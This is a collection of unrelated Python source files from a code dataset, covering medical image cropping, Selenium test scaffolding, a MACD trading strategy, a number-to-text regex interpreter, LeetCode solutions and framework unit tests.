data to match axial:\n sag_to_axial = prob_maps_sag.transpose((2, 0, 1, 3))\n # Reshape coronal data to match axial:\n cor_to_sag = prob_maps_cor.transpose((1, 0, 2, 3))\n cor_to_axial = cor_to_sag.transpose((2, 0, 1, 3))\n temp = np.maximum.reduce([sag_to_axial,cor_to_axial,prob_maps_axial])\n return temp\n\n# Region retraction\ndef cut_region(volumen1):\n for i in range(volumen1.shape[0]):\n if np.max(volumen1[i,:,:]) == 1:\n break \n \n for j in range(volumen1.shape[1]):\n if np.max(volumen1[:,j,:]) == 1:\n break \n \n for k in range(volumen1.shape[2]):\n if np.max(volumen1[:,:,k]) == 1:\n break\n \n for i2 in reversed(range(volumen1.shape[0])):\n if np.max(volumen1[i2,:,:]) == 1:\n break \n \n for j2 in reversed(range(volumen1.shape[1])):\n if np.max(volumen1[:,j2,:]) == 1:\n break \n \n for k2 in reversed(range(volumen1.shape[2])):\n if np.max(volumen1[:,:,k2]) == 1:\n break \n #factor = int(np.ceil(0.02*volumen1.shape[0]))\n #cut_volumen = volumen1[i-factor:i2+factor,j-factor:j2+factor,k-factor:k2+factor]\n return i,i2,j,j2,k,k2\n\n# Load data:\nfilelist_test = natural_sort(glob.glob('WHS/ct_train_test/ct_test/*_image.nii.gz')) # list of file names\n\nfilelist_train = natural_sort(glob.glob('WHS/Augment_data/*_image.nii')) # list of file names\nfilelist_train_label = natural_sort(glob.glob('WHS/Augment_data/*_label.nii')) # list of file names\n\n# Load test data:\nfiles_p0_axial = natural_sort(glob.glob('WHS/Results/Predictions/region/test_prob_maps_axial_*.npz')) # list of file names\nfiles_p0_sag = natural_sort(glob.glob('WHS/Results/Predictions/region/test_prob_maps_sag_*.npz')) # list of file names\nfiles_p0_cor = natural_sort(glob.glob('WHS/Results/Predictions/region/test_prob_maps_cor_*.npz')) # list of file names\n\n## Load train data:\nfiles_p1_axial = natural_sort(glob.glob('WHS/Results/Predictions/region/train_prob_maps_axial_*.npz')) # list of file names\nfiles_p1_sag = natural_sort(glob.glob('WHS/Results/Predictions/region/train_prob_maps_sag_*.npz')) # list of file names\nfiles_p1_cor = natural_sort(glob.glob('WHS/Results/Predictions/region/train_prob_maps_cor_*.npz')) # list of file names\n\n#for n in range(len(files_p0_axial)):\n# axial_data = np.load(files_p0_axial[n])\n# prob_maps_axial = axial_data['prob_maps']\n# sag_data = np.load(files_p0_sag[n])\n# prob_maps_sag = sag_data['prob_maps']\n# cor_data = np.load(files_p0_cor[n])\n# prob_maps_cor = cor_data['prob_maps']\n#\n# # Create fused propability map\n# fused_prob_maps = fusion(prob_maps_axial, prob_maps_sag, prob_maps_cor)\n# full_prob_maps = np.zeros([512,512,512,2])\n# for i in range(2):\n# full_prob_maps[:,:,:,i] = resize(fused_prob_maps[:,:,:,i],(512,512,512)) \n# label = full_prob_maps.argmax(axis=-1)\n# image = create_data(filelist_test[n])\n#\n# # Get bounding box\n# i,i2,j,j2,k,k2 = cut_region(label)\n# # Load original data\n# factor =int(np.ceil(0.02*image.shape[0]))\n# start = int(np.floor(np.min([i,j,k])-factor))\n# end = int(np.ceil(np.max([i2,j2,k2])+factor))\n# cut = [start,end]\n# if cut[0] < 0:\n# cut[0] = 0\n# if cut[1] > image.shape[0]:\n# cut[1] = image.shape[0]\n# # Crop bounding box of original data\n# cut_img = image[cut[0]:cut[1],cut[0]:cut[1],cut[0]:cut[1]]\n# np.savez('WHS/Data/test_segments_{}'.format(n),images=cut_img,cut=cut)\n# print('Test image', (n+1), 'cut', (cut))\n\nfor n in range(len(files_p1_axial)):\n axial_data = np.load(files_p1_axial[n])\n prob_maps_axial = axial_data['prob_maps']\n sag_data = np.load(files_p1_sag[n])\n prob_maps_sag = sag_data['prob_maps']\n cor_data = 
np.load(files_p1_cor[n])\n prob_maps_cor = cor_data['prob_maps']\n\n # Create fused propability map\n fused_prob_maps = fusion(prob_maps_axial, prob_maps_sag, prob_maps_cor)\n labels = fused_prob_maps.argmax(axis=-1)\n image = create_data(filelist_train[n])\n groundtruth = create_label(filelist_train_label[n])\n # Get bounding box\n i,i2,j,j2,k,k2 = cut_region(labels)\n\n # Load original data\n factor =int(np.ceil(0.02*groundtruth.shape[0]))\n mult_factor = image.shape[0]/labels.shape[0]\n start = int(np.floor(np.min([i,j,k])*mult_factor-factor))\n end = int(np.ceil(np.max([i2,j2,k2])*mult_factor+factor))\n cut = [start,end]\n if cut[0] < 0:\n cut[0] = 0\n if cut[1] > image.shape[0]:\n cut[1] = image.shape[0]\n # Crop bounding box of original data\n cut_GT = groundtruth[cut[0]:cut[1],cut[0]:cut[1],cut[0]:cut[1]]\n cut_GT = np.round(cut_GT)\n cut_img = image[cut[0]:cut[1],cut[0]:cut[1],cut[0]:cut[1]]\n np.savez('WHS/Data/train_segments_{}'.format(n),images=cut_img,labels=cut_GT,cut=cut)\n print('Train image', (n+1), 'cut', (cut))\n","repo_name":"honorifica/whole-heart-segmentation-1","sub_path":"Region/region_crop.py","file_name":"region_crop.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"23027095416","text":"from selenium import webdriver\nfrom datetime import date\nimport time, sys\nimport ProjectConstant\n# adding framework to project\nsys.path.insert(0, ProjectConstant.FRAMEWORK_PATH)\nfrom framework.WebDriverFactory.DriverFactory import DriverFactory\nfrom framework.Utils.Logging.LoggingUtils import LoggingUtils\nfrom framework.Utils.DataUtils.ExcelRW import ExcelReader, ExcelWriter\n\nclass BaseTestClass(object):\n def __init__(self):\n self.logger = self.get_logger()\n self.driver = self.start_driver()\n\n\n def get_logger(self):\n log_utils = LoggingUtils()\n today = date.today()\n current_date_time = today.strftime(\"%b-%d-%Y\")\n log_file_name = ProjectConstant.LOG_FILE_NAME + \"_\" + current_date_time + ProjectConstant.LOG_FILE_EXTENTION\n logger = log_utils.get_logger(ProjectConstant.LOG_FILE_PATH, log_file_name)\n self.logger = logger\n return logger\n\n def get_data(self, tc_id, header_name):\n data_reader = ExcelReader()\n self.logger.debug(\"Reading file: %s\"%ProjectConstant.LOGIN_DATA_FILE_PATH)\n data = data_reader.get_data_by_header_and_tc_id(logger=self.logger, file_path=ProjectConstant.LOGIN_DATA_FILE_PATH, \n sheet_name=ProjectConstant.LOGIN_DATA_SHEET_NAME, tc_id=tc_id, header_name=header_name)\n return data\n \n def set_result(self, tc_id, header, tc_result):\n data_writer = ExcelWriter()\n self.logger.debug(\"Writing to file: %s\"%ProjectConstant.LOGIN_DATA_FILE_PATH)\n write = data_writer.set_test_result(logger=self.logger, file_path=ProjectConstant.LOGIN_DATA_FILE_PATH, \n sheet_name=ProjectConstant.LOGIN_DATA_SHEET_NAME, testcase_id=tc_id, header_name=header, result=tc_result)\n return write\n\n def start_driver(self):\n browser = ProjectConstant.BROWSER\n entry_url = ProjectConstant.ENTRY_URL\n self.logger.info(\"Starting WebDriver [%s] on: %s\" %(browser, entry_url))\n driver = DriverFactory.init_driver(self.logger, entry_url, browser)\n self.driver = driver\n return driver\n\n\n def terminate_driver(self, driver):\n self.logger.info('BaseTestClass: terminate driver')\n DriverFactory.close_browser(self.logger, 
driver)\n","repo_name":"skbaithadiya/pythonframework_v2","sub_path":"project/TestCases/BaseTC.py","file_name":"BaseTC.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13929746750","text":"# NOTE: presumed imports -- the original snippet omitted them; the calls below\n# (web.get_data_yahoo, ta.macd) suggest pandas_datareader and pandas_ta.\nfrom datetime import date\n\nimport numpy as np\nimport pandas as pd\nimport pandas_datareader.data as web\nimport pandas_ta as ta\n\nSec='TATAMOTORS.NS'\ndef graph_plot(Sec):\n    stocksymbols = Sec\n    startdate = date(2017,8,4)\n    end_date = date.today()\n    def getMyPortfolio(stocks = stocksymbols ,start = startdate , end = end_date):\n        # get_data_yahoo already implies the Yahoo source, so no data_source argument is passed\n        data = web.get_data_yahoo(stocks , start = start ,end= end )\n        return data\n    data = getMyPortfolio(stocksymbols)\n    macd = ta.macd(data['Close'])\n    data = pd.concat([data, macd], axis=1).reindex(data.index)\n    def MACD_Strategy(df, risk):\n        MACD_Buy=[]\n        MACD_Sell=[]\n        position=False\n\n        for i in range(0, len(df)):\n            if df['MACD_12_26_9'][i] > df['MACDs_12_26_9'][i] :\n                MACD_Sell.append(np.nan)\n                if position ==False:\n                    MACD_Buy.append(df['Adj Close'][i])\n                    position=True\n                else:\n                    MACD_Buy.append(np.nan)\n            elif df['MACD_12_26_9'][i] < df['MACDs_12_26_9'][i] :\n                MACD_Buy.append(np.nan)\n                if position == True:\n                    MACD_Sell.append(df['Adj Close'][i])\n                    position=False\n                else:\n                    MACD_Sell.append(np.nan)\n            elif position == True and df['Adj Close'][i] < MACD_Buy[-1] * (1 - risk):\n                MACD_Sell.append(df[\"Adj Close\"][i])\n                MACD_Buy.append(np.nan)\n                position = False\n            elif position == True and df['Adj Close'][i] < df['Adj Close'][i - 1] * (1 - risk):\n                MACD_Sell.append(df[\"Adj Close\"][i])\n                MACD_Buy.append(np.nan)\n                position = False\n            else:\n                MACD_Buy.append(np.nan)\n                MACD_Sell.append(np.nan)\n\n        data['MACD_Buy_Signal_price'] = MACD_Buy\n        data['MACD_Sell_Signal_price'] = MACD_Sell\n    MACD_strategy = MACD_Strategy(data, 0.025)\n    def MACD_color(data):\n        MACD_color = []\n        for i in range(0, len(data)):\n            if data['MACDh_12_26_9'][i] > data['MACDh_12_26_9'][i - 1]:\n                MACD_color.append(True)\n            else:\n                MACD_color.append(False)\n        return MACD_color\n\n    data['positive'] = MACD_color(data)\n\n    # plt.rcParams.update({'font.size': 10})\n    # fig, ax1 = plt.subplots(figsize=(14,8))\n    # fig.suptitle(stocksymbols[0], fontsize=10, backgroundcolor='blue', color='white')\n    # ax1 = plt.subplot2grid((14, 8), (0, 0), rowspan=8, colspan=14)\n    # ax2 = plt.subplot2grid((14, 12), (10, 0), rowspan=6, colspan=14)\n    # ax1.set_ylabel('Price in ')\n    # ax1.plot('Adj Close',data=data, label='Close Price', linewidth=0.5, color='blue')\n    # ax1.scatter(data.index, data['MACD_Buy_Signal_price'], color='green', marker='^', alpha=1)\n    # ax1.scatter(data.index, data['MACD_Sell_Signal_price'], color='red', marker='v', alpha=1)\n    # ax1.legend()\n    # ax1.grid()\n    # ax1.set_xlabel('Date', fontsize=8)\n\n    # ax2.set_ylabel('MACD', fontsize=8)\n    # ax2.plot('MACD_12_26_9', data=data, label='MACD', linewidth=0.5, color='blue')\n    # ax2.plot('MACDs_12_26_9', data=data, label='signal', linewidth=0.5, color='red')\n    # ax2.bar(data.index,'MACDh_12_26_9', data=data, label='Volume', color=data.positive.map({True: 'g', False: 'r'}),width=1,alpha=0.8)\n    # ax2.axhline(0, color='black', linewidth=0.5, alpha=0.5)\n    # ax2.grid()\n    # plt.show()\n    data['date'] = pd.to_datetime(data.index,format='%Y%m%d')\n    data['year'] = pd.DatetimeIndex(data['date']).year\n    data = data.replace(np.nan, 
'nan')\ngraph_plot(Sec)\n","repo_name":"ramyav23/Stock-Portfolio-Management-","sub_path":"Ramya_Venkatesh/Project/server/Sec='TATAMOTORS.NS'.py","file_name":"Sec='TATAMOTORS.NS'.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20123611572","text":"\"Soros interpreter (see http://numbertext.org)\"\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport re, sys\n\ndef run(program, data, lang):\n return compile(program, lang).run(data)\n\ndef compile(program, lang):\n return _Soros(program, lang)\n\n# conversion function\ndef _tr(text, chars, chars2, delim):\n for i in range(0, len(chars)):\n text = text.replace(delim + chars[i], chars2[i])\n return text\n\n# string literals for metacharacter encoding\n_m = \"\\\\\\\";#$()|[]\"\n_c = u\"\\uE000\\uE001\\uE002\\uE003\\uE004\\uE005\\uE006\\uE007\\uE008\\uE009\" # Unicode private area\n_pipe = u\"\\uE003\"\n# separator prefix = \\uE00A\n\n# pattern to recognize function calls in the replacement string\n_func = re.compile(_tr(r\"\"\"(?:\\|?(?:\\$\\()+)? # optional nested calls\n (\\|?\\$\\(([^\\(\\)]*)\\)\\|?) # inner call (2 subgroups)\n (?:\\uE00A?\\)+\\|?)?\"\"\", # optional nested calls\n _m[4:8], _c[:4], \"\\\\\"), re.X) # \\$, \\(, \\), \\| -> \\uE000..\\uE003\n\nclass _Soros:\n def __init__(self, prg, lang):\n self.lines = []\n if prg.find(\"__numbertext__\") == -1:\n prg = \"__numbertext__;\" + prg\n # default left zero deletion\n # and separator function (no separation, if subcall returns with empty string)\n prg = prg.replace(\"__numbertext__\", u\"\"\"0+(0|[1-9]\\\\d*) $1\n\\\"([a-z][-a-z]* )0+(0|[1-9]\\\\d*)\\\" $(\\\\1\\\\2)\n\\\"\\uE00A(.*)\\uE00A(.+)\\uE00A(.*)\\\" \\\\1\\\\2\\\\3\n\\\"\\uE00A.*\\uE00A\\uE00A.*\\\"\n\"\"\")\n prg = _tr(prg, _m[:4], _c[:4], \"\\\\\") # \\\\, \\\", \\;, \\# -> \\uE000..\\uE003\n # switch off all country-dependent lines, and switch on the requested ones\n prg = re.sub(r\"(^|[\\n;])([^\\n;#]*#[^\\n]*[\\[]:[^\\n:\\]]*:][^\\n]*)\", r\"\\1#\\2\", prg)\n prg = re.sub(r\"(^|[\\n;])#([^\\n;#]*#[^\\n]*[\\[]:\" + lang.replace(\"_\", \"-\") + r\":][^\\n]*)\", r\"\\1\\2\", prg)\n matchline = re.compile(\"^\\s*(\\\"[^\\\"]*\\\"|[^\\s]*)\\s*(.*[^\\s])?\\s*$\")\n prefix = \"\"\n for s in re.sub(\"(#[^\\n]*)?(\\n|$)\", \";\", prg).split(\";\"):\n macro = re.match(\"== *(.*[^ ]?) ==\", s)\n if macro != None:\n prefix = macro.group(1)\n continue\n m = matchline.match(s)\n if prefix != \"\" and s != \"\" and m != None:\n s = m.group(1).strip(\"\\\"\")\n space = \" \" if s != \"\" else \"\"\n caret = \"\"\n if s[0:1] == \"^\":\n s = s[1:]\n caret = \"^\"\n s2 = m.group(2) if m.group(2) != None else \"\"\n s = \"\\\"\" + caret + prefix + space + s + \"\\\" \" + s2\n m = matchline.match(s)\n if m != None:\n s = _tr(m.group(1).strip(\"\\\"\"), _c[1:4], _m[1:4], \"\") \\\n .replace(_c[_m.find(\"\\\\\")], \"\\\\\\\\\") # -> \\\\, \", ;, #\n if m.group(2) != None:\n s2 = m.group(2).strip(\"\\\"\")\n else:\n s2 = \"\"\n s2 = _tr(s2, _m[4:], _c[4:], \"\\\\\") # \\$, \\(, \\), \\|, \\[, \\] -> \\uE004..\\uE009\n # call inner separator: [ ... $1 ... ] -> $(\\uE00A ... \\uE00A$1\\uE00A ... 
)\n s2 = re.sub(r\"[\\[]\\$(\\d\\d?|\\([^\\)]+\\))\",u\"$(\\uE00A\\uE00A|$\\\\1\\uE00A\", s2)\n s2 = re.sub(r\"[\\[]([^\\$[\\\\]*)\\$(\\d\\d?|\\([^\\)]+\\))\",u\"$(\\uE00A\\\\1\\uE00A$\\\\2\\uE00A\", s2)\n s2 = re.sub(r\"]\",\")\", s2)\n s2 = re.sub(r\"(\\$\\d|\\))\\|\\$\", r\"\\1||$\", s2) # $()|$() -> $()||$()\n s2 = _tr(s2, _c[:4], _m[:4], \"\") # \\uE000..\\uE003-> \\, \", ;, #\n s2 = _tr(s2, _m[4:8], _c[:4], \"\") # $, (, ), | -> \\uE000..\\uE003\n s2 = _tr(s2, _c[4:], _m[4:], \"\") # \\uE004..\\uE009 -> $, (, ), |, [, ]\n s2 = re.sub(r\"\\\\(\\d)\", r\"\\\\g<\\1>\",\n re.sub(r\"\\uE000(\\d)\", \"\\uE000\\uE001\\\\\\\\g<\\\\1>\\uE002\", s2))\n try:\n self.lines = self.lines + [[\n re.compile(\"^\" + s.lstrip(\"^\").rstrip(\"$\") + \"$\"),\n s2, s[:1] == \"^\", s[-1:] == \"$\"]]\n except:\n print(\"Error in following regex line: \" + s, file=sys.stderr)\n raise\n\n def run(self, data):\n return self._run(data, True, True)\n\n def _run(self, data, begin, end):\n for i in self.lines:\n if not ((begin == False and i[2]) or (end == False and i[3])):\n m = i[0].match(data)\n if m:\n try:\n s = m.expand(i[1])\n except:\n print(\"Error for the following input: \" + data, file=sys.stderr)\n raise\n n = _func.search(s)\n while n:\n b = False\n e = False\n if n.group(1)[0:1] == _pipe or n.group()[0:1] == _pipe:\n b = True\n elif n.start() == 0:\n b = begin\n if n.group(1)[-1:] == _pipe or n.group()[-1:] == _pipe:\n e = True\n elif n.end() == len(s):\n e = end\n s = s[:n.start(1)] + self._run(n.group(2), b, e) + s[n.end(1):]\n n = _func.search(s)\n return s\n return \"\"\n","repo_name":"Numbertext/libnumbertext","sub_path":"src/Soros.py","file_name":"Soros.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"54"} +{"seq_id":"72154247521","text":"class Person(object):\n\n country = \"India\" # class variable\n\n def __init__(self, name_val, age_val, education_val):\n self.person_name = name_val\n self.person_age = age_val\n self.person_edu = education_val\n\n def isPerson(self):\n return True\n\n def get_person_details(self):\n return \"Name : {0} \\nAge : {1}\\nEducation : {2}\".format(self.person_name,\n self.person_age, self.person_edu)\n\nclass Employee(Person):\n\n def __init__(self, name, age, edu, emp_code, emp_department):\n super(Employee, self).__init__(name, age, edu)\n self.employee_code = emp_code\n self.employee_deparment = emp_department\n \n def get_all_details(self):\n person_details = self.get_person_details()\n print(person_details)\n print(\"Employee code is {}\\nDepartment is {}\".format(self.employee_code,\n self.employee_deparment))\n\nif __name__ == \"__main__\":\n\n emp_obj = Employee(\"AAA\", \"12\", \"B.E\", \"1234\", \"Fire\")\n emp_obj.get_all_details()\n print(\"Country is \", Employee.country)\n emp_obj1 = Employee(\"BBB\", \"23\", \"M.E\", \"10101\", \"Accoutant\")\n emp_obj1.get_all_details()\n print(\"Country is \", Employee.country) # accessing class attribute\n","repo_name":"imushir/qxp_python_class_aug_2019","sub_path":"29092019/class/single_heritance_ex_i.py","file_name":"single_heritance_ex_i.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24126748588","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfrom collections import deque\n\nclass 
Solution:\n    def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n        if not root:\n            return []\n        self.ret = [[]]\n        q = deque([root, 0])\n        c = 0\n        while q:\n            n = q.popleft()\n            l = q.popleft()\n\n            if l != c:\n                self.ret.append([])\n                c = l\n\n            self.ret[c].append(n.val)\n\n            if n.left:\n                q.append(n.left)\n                q.append(l+1)\n            if n.right:\n                q.append(n.right)\n                q.append(l+1)\n\n        return self.ret\n","repo_name":"recursean/leetcode-solutions","sub_path":"python/pr102.py","file_name":"pr102.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"71892506401","text":"class Solution:\n    def removeDuplicates(self, nums: List[int]) -> int:\n        if not nums:\n            return 0\n        if len(nums) == 1:\n            return 1\n\n        for k in range(len(nums)-1, 0, -1):\n            if nums[k] == nums[k-1]:\n                nums.pop(k)\n\n        return len(nums)\n\n#Approach: Two Pointers\n\nclass Solution:\n    # @param a list of integers\n    # @return an integer\n    def removeDuplicates(self, A):\n        if not A:\n            return 0\n\n        newTail = 0\n\n        for i in range(1, len(A)):\n            if A[i] != A[newTail]:\n                newTail += 1\n                A[newTail] = A[i]\n\n        return newTail + 1\n","repo_name":"ThibautHurson/LeetCode","sub_path":"26-remove_duplicates_from_sorted_array.py","file_name":"26-remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"73792632481","text":"import asyncio\nfrom service import TrainerServer, Leader, TrainerClient\nimport sys, getopt\nfrom models import ResNetMNIST, BasicModel\nfrom models.ResNet import ResNetCIFAR10\nfrom rpc import *\nfrom utils import model_to_chunks\n\ndef leader_job():\n    pass\n\ndef get_request(model: BasicModel):\n    for chunk in model_to_chunks(model):\n        yield TrainRequest(model_chunk=chunk)\n\nasync def main(port: int = None, isLeader: bool = False):\n    trainer_server = TrainerServer(port)\n    await trainer_server.start()\n\n    if isLeader:\n        # If this node is the leader, start the leader's work\n        leader = Leader(ResNetCIFAR10(3000), trainer_server.service, 20)\n        await leader.start()\n\n    await trainer_server.blockingUtilShutdown()\n\n\nif __name__ == \"__main__\":\n\n    # get port from command line\n    port = None\n    isLeader = False\n    try:\n        opts, args = getopt.getopt(sys.argv[1:], \"p:l\", [\"port=\", \"leader=\"])\n        for opt, arg in opts:\n            if opt in (\"-p\", \"--port\"):\n                port = int(arg)\n            elif opt in (\"-l\", \"--leader\"):\n                isLeader = True\n    except getopt.GetoptError:\n        print('main.py -p <port> | --port <port>')\n        sys.exit(2)\n\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(main(port, isLeader))\n\n","repo_name":"yzzer123/fedavg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"20636594633","text":"def back(choice):\n    if len(choice) == 3:\n        print(*choice)\n    else:\n        for i in range(1,6):\n            if not used[i]:\n                used[i] = 1\n                choice.append(i)\n                back(choice)\n                used[i] = 0\n                choice.pop()\n\n\nnumbers = list(range(1, 6))\nused = [0]*6\nback([])","repo_name":"dodonmountain/algorithm","sub_path":"2019_late/adv대비/aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"72068120801","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, 
models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('wedding', '0003_auto_20160128_0149'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='rsvp',\n name='status',\n ),\n migrations.AddField(\n model_name='rsvp',\n name='attending',\n field=models.BooleanField(default=True),\n ),\n migrations.AddField(\n model_name='rsvp',\n name='responded',\n field=models.BooleanField(default=False),\n ),\n ]\n","repo_name":"bpapillon/ben-and-meghan","sub_path":"wedding/migrations/0004_auto_20160128_0216.py","file_name":"0004_auto_20160128_0216.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3869665927","text":"import sqlalchemy as sqla\nimport ptah\nfrom ptah.populate import POPULATE_ID, Populate\nfrom pyramid import testing\nfrom pyramid.exceptions import ConfigurationConflictError\n\n\nclass TestPopulateDirective(ptah.PtahTestCase):\n\n _init_ptah = False\n\n def test_step_registration(self):\n import ptah\n\n @ptah.populate('step', title='Step', requires=['test-dep'])\n def step(registry):\n \"\"\" \"\"\"\n\n self.init_ptah()\n\n data = ptah.get_cfg_storage(POPULATE_ID)\n\n self.assertIn('step', data)\n self.assertIs(data['step']['factory'], step)\n self.assertEqual(data['step']['title'], 'Step')\n self.assertTrue(data['step']['active'])\n self.assertEqual(data['step']['requires'], ['test-dep'])\n\n def test_step_pyramid_registration(self):\n\n def step(registry):\n \"\"\" \"\"\"\n\n config = testing.setUp()\n config.include('ptah')\n config.ptah_populate_step('step', factory=step,\n title='Test', active=False)\n config.commit()\n\n data = config.get_cfg_storage(POPULATE_ID)\n\n self.assertIn('step', data)\n self.assertIs(data['step']['factory'], step)\n self.assertEqual(data['step']['title'], 'Test')\n self.assertFalse(data['step']['active'])\n self.assertEqual(data['step']['requires'], ())\n\n def test_step_registration_conflicts(self):\n import ptah\n\n @ptah.populate('step')\n @ptah.populate('step')\n def step(registry):\n \"\"\" \"\"\"\n\n self.assertRaises(ConfigurationConflictError, self.init_ptah)\n\n\nclass TestPyramidDrective(ptah.PtahTestCase):\n\n def test_directive_execute(self):\n data = [False, False]\n def step1(registry):\n data[0] = True\n\n def step2(registry): # pragma: no cover\n data[0] = True\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n self.config.ptah_populate()\n\n self.assertTrue(data[0])\n self.assertFalse(data[1])\n\n def test_directive_execute_populate_mode(self):\n data = [False]\n def step(registry): # pragma: no cover\n data[0] = True\n\n self.config.ptah_populate_step(\n 'custom-step', title='Custom step',\n active=True, factory=step)\n\n import ptah\n ptah.POPULATE = True\n\n self.config.ptah_populate()\n\n ptah.POPULATE = False\n\n self.assertFalse(data[0])\n\n\nclass TestListSteps(ptah.PtahTestCase):\n\n def test_list_simple(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps()\n steps = dict((s['name'], s) for s in steps)\n\n self.assertIn('custom-step1', 
steps)\n self.assertNotIn('custom-step2', steps)\n self.assertEqual(steps['custom-step1']['factory'], step1)\n\n def test_list_all(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps(all=True)\n steps = dict((s['name'], s) for s in steps)\n\n self.assertIn('custom-step1', steps)\n self.assertIn('custom-step2', steps)\n self.assertEqual(steps['custom-step1']['factory'], step1)\n self.assertEqual(steps['custom-step2']['factory'], step2)\n\n def test_list_explicit(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps(('custom-step2',))\n steps = dict((s['name'], s) for s in steps)\n\n self.assertNotIn('custom-step1', steps)\n self.assertIn('custom-step2', steps)\n\n def test_list_requires_inactive(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, requires=('custom-step2',), factory=step1)\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps()\n d_steps = dict((s['name'], s) for s in steps)\n\n self.assertIn('custom-step1', d_steps)\n self.assertIn('custom-step2', d_steps)\n\n def test_list_requires_order(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, requires=('custom-step2',), factory=step1)\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps()\n l_steps = [s['name'] for s in steps]\n\n self.assertTrue(l_steps.index('custom-step2') <\n l_steps.index('custom-step1'))\n\n def test_list_once(self):\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1', requires=('custom-step2',))\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2')\n self.config.ptah_populate_step(\n 'custom-step3', title='Custom step 3', requires=('custom-step2',))\n\n steps = Populate(self.registry).list_steps()\n\n count = 0\n for step in steps:\n if step['name'] == 'custom-step2':\n count += 1\n\n self.assertEqual(count, 1)\n\n def test_list_unknown(self):\n self.assertRaises(\n RuntimeError,\n Populate(self.registry).list_steps, ('unknown',))\n\n def test_list_unknown_dependency(self):\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1', requires=('unknown',))\n\n self.assertRaises(\n RuntimeError, Populate(self.registry).list_steps)\n\n\nclass TestCreateDbSchema(ptah.PtahTestCase):\n\n def test_event(self):\n from ptah.populate import create_db_schema\n\n data = [False]\n def event_handler(ev):\n data[0] = True\n\n self.registry.registerHandler(\n event_handler, (ptah.events.BeforeCreateDbSchema,))\n\n create_db_schema(self.registry)\n self.assertTrue(data[0])\n\n def test_skip_tables(self):\n from ptah.populate import 
create_db_schema\n\n base = ptah.get_base()\n\n class test_populate_TestTable(base):\n __tablename__ = 'test_populate_TestTable'\n\n id = sqla.Column('id', sqla.Integer, primary_key=True)\n\n cfg = ptah.get_settings(ptah.CFG_ID_PTAH)\n cfg['db_skip_tables'] = ('test_populate_TestTable',)\n\n create_db_schema(self.registry)\n\n self.assertFalse(\n base.metadata.tables['test_populate_TestTable'].exists())\n\n cfg['db_skip_tables'] = ()\n create_db_schema(self.registry)\n\n self.assertTrue(\n base.metadata.tables['test_populate_TestTable'].exists())\n","repo_name":"carlicos/ptah","sub_path":"ptah/tests/test_populate.py","file_name":"test_populate.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"41498106905","text":"from __future__ import absolute_import, division, print_function\nfrom future import standard_library\n\nstandard_library.install_aliases() # noqa: E402\n\nimport argparse\nimport logging\nimport os\nimport 